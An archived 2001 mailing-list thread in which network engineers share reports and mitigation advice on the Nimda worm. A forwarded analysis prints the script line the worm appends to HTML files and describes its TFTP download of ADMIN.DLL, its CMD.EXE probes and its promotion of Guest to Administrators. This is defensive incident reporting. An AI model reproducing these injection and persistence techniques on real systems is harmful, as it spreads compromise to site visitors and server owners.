That's the nimda worm. I sent two messages to the group about it yesterday morning. "FW: Worm probes" and "FW: Worm probes - Part II". It included emails sent to the NANOG newsgroup that talked about the types of problems and impact people had been experiencing. There's several messages there that detail the various events that the worm causes to occur--and it seems like it does quite a bit of really nasty stuff. Rik, it's Cisco relevant because NBAR can be used to block the entrance of the worm into your network... -- Leigh Anne > -----Original Message----- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of > Rik Guyler > Sent: Wednesday, September 19, 2001 7:52 AM > To: [EMAIL PROTECTED] > Subject: RE: Alert: Some sort of IIS worm seems to be propagating > [7:20388] > > > I was doing battle with this beastie last night until midnight. > This one's > very bad as it overwrites files with various ".eml" files, > typically seen is > "readme.eml". If you do a search on the local drives for the > extension, you > will find numerous files (over 1600 in my case last night) found. > > How does this relate to Cisco? Well, I was originally called for a router > problem as the Internet browsing and email transfer was very slow and of > course the client's first thought was that there was a telco, router, DSU, > etc. issue. I checked the router and the console (and VTY) was VERY slow. > I ran a "show processor cpu" and discovered the processor utilization was > nearly 100% and was staying there, which explains why the console was so > slow. Upon deeper scrutiny, I found that "IP input" was the process using > most of the processor, which indicates that IP traffic is jamming the > router. With this knowledge, I went after the worm, which unfortunately, > has no simple fix, at least at this time. When I removed the server from > the network, the router was fine. > > So, all of the engineers that are so Cisco focused that a mere > virus doesn't > matter take heed - not everything can be judged on first impressions. > > --- > Rik Guyler > > -----Original Message----- > From: Brad Ellis [mailto:[EMAIL PROTECTED]] > Sent: Wednesday, September 19, 2001 2:30 AM > To: [EMAIL PROTECTED] > Subject: Re: Alert: Some sort of IIS worm seems to be propagating > [7:20366] > > > John Kaberna, ([EMAIL PROTECTED]), sent me the following info: > > " This may be what you are experiencing: > > http://www.cert.org/current/current_activity.html#port80 > > > Make sure you patch IIS if you haven't done so already. Check to see > if you're already infected with Code Red and follow the instructions > to get rid of it. > > http://www.microsoft.com/technet/treeview/default.asp?url=/technet/sec > urity/bulletin/MS01-044.asp > > > You can also use NBAR to block Red Worm if you haven't done so > already. > > http://www.cisco.com/warp/customer/63/nbar_acl_codered.shtml " > > -Brad Ellis > CCIE#5796 > Network Learning Inc > [EMAIL PROTECTED] > used Cisco: www.optsys.net > ""Farhan Ahmed"" wrote in message > [EMAIL PROTECTED]">news:[EMAIL PROTECTED]... > > -----Original Message----- > > From: Simon Clausen [mailto:[EMAIL PROTECTED]] > > Sent: Wednesday, September 19, 2001 12:49 AM > > To: [EMAIL PROTECTED] > > Subject: Re: Alert: Some sort of IIS worm seems to be propagating > > > > > > Sent on behalf of Rich Zuris ([EMAIL PROTECTED]) due to his network > > being taken offline by the worm. > > > > Following is a list of recorded changes made to NT4 SP6a with Q299444 > > rollup security patches. > > > > The following is appended to EVERY HTML file on the machine: > > window.open("readme.eml", null, > > "resizable=no,top=6000,left=6000") > > > > Just about every directory on the machine has one or more files with > > extension .eml, mostly readme.eml but also other names that seem to > > correspond to directory or other filenames. Total of 1234 .eml files > > created, totalling 98Mb (about 78Kb each). Also got 55 files with > > extension .nws, containing exact same content. Both .eml and .nws files > > can be opened by Outlook Express. > > > > Virus makes numerous outbound connections to port 80 to propagate itself > > to other servers. > > > > Virus sets IE5 to IE4 compatibility mode (apparently to circumvent > > security) and crashes Explorer.exe when IE is launched. IExplore.exe > > appears to be hacked, and there is now a hidden IExplore .exe (note the > > space before the extension) in same directory. > > > > Virus code in stealth executable file with name tftp###, where ### is > > any numeric string. File has no extension, but it is definitely a > > Windows executable. This file is placed into \Program Files\Common > > Files\System\MSADC, and in same directory, Admin.dll appears to be > > hacked. > > > > IIS console hacked: New MMC.EXE placed in \WINNT directory, which may > > override original version in \WINNT\System32. > > > > EXE files placed into TEMP directory. Note that most/all hacked EXE > > files are flagged Hidden. > > > > Riched20.dll files placed in random directories (not on PATH, not > > containing executables). > > > > NT Account "Guest" was made a member of the NT "Administrators" group! > > > > Regards, > > > > Simon Clausen > > > > -----Original Message----- > > From: Windows NTBugtraq Mailing List > > [mailto:[EMAIL PROTECTED]] On Behalf Of Russ > > Sent: Wednesday, 19 September 2001 1:21 AM > > To: [EMAIL PROTECTED] > > Subject: Alert: Some sort of IIS worm seems to be propagating > > > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > There have been numerous reports of IIS attacks being generated by > > machines over a broad range of IP addresses. These "infected" machines > > are using a wide variety of attacks which attempt to exploit already > > known and patched vulnerabilities against IIS. > > > > It appears that the attacks can come both from email and from the > > network. > > > > A new worm, being called w32.nimda.amm, is being sent around. The > > attachment is called README.EXE and comes as a MIME-type of > > "audio/x-wav" together with some html parts. There appears to be no text > > in this message when it is displayed by Outlook when in Auto-Preview > > mode (always a good indication there's something not quite right with an > > email.) > > > > The network attacks against IIS boxes are a wide variety of attacks. > > Amongst them appear to be several attacks that assume the machine is > > compromised by Code Red II (looking for ROOT.EXE in the /scripts and > > /msadc directory, as well as an attempt to use the /c and /d virtual > > roots to get to CMD.EXE). Further, it attempts to exploit numerous other > > known IIS vulnerabilities. > > > > One thing to note is the attempt to execute TFTP.EXE to download a file > > called ADMIN.DLL from (presumably) some previously compromised box. > > > > Anyone who discovers a compromised machine (a machine with ADMIN.DLL in > > the /scripts directory), please forward me a copy of that .dll ASAP. > > > > Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the > > following; > > > > edit %systemroot/system32/drivers/etc/services. > > > > change the line; > > > > tftp 69/udp > > > > to; > > > > tftp 0/udp > > > > thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows > > File Protection so can't be removed. > > > > More information as it arises. > > > > Cheers, > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor > > > > -----BEGIN PGP SIGNATURE----- > > Version: PGP Personal Privacy 6.5.2 > > > > iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH > > Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6 > > iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO > > hSW7yN2lhJc= > > =YAwc > > -----END PGP SIGNATURE----- > > > > ======================================================================== > > ==== > > Delivery co-sponsored by Trend Micro, Inc. > > ======================================================================== > > ==== > > TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE > > > > If you are worried about email viruses, you need Trend Micro ScanMail > > for Exchange. ScanMail is the first antivirus solution that seamlessly > > integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. > > ScanMail ensures 100% inbound and outbound email virus scanning and > > provides remote software management. Download a FREE 30-day trial copy > > of ScanMail and find out why it is the best: > > http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 > > ======================================================================== > > ==== > > > > > ================================================================== > ========== > > Delivery co-sponsored by Trend Micro, Inc. > > > ================================================================== > ========== > > TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE > > > > If you are worried about email viruses, you need Trend Micro > ScanMail for > > Exchange. ScanMail is the first antivirus solution that seamlessly > > integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. > ScanMail > > ensures 100% inbound and outbound email virus scanning and > provides remote > > software management. Download a FREE 30-day trial copy of ScanMail and > find > > out why it is the best: > > http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 > > > ================================================================== > ========== Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=20405&t=20405 -------------------------------------------------- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
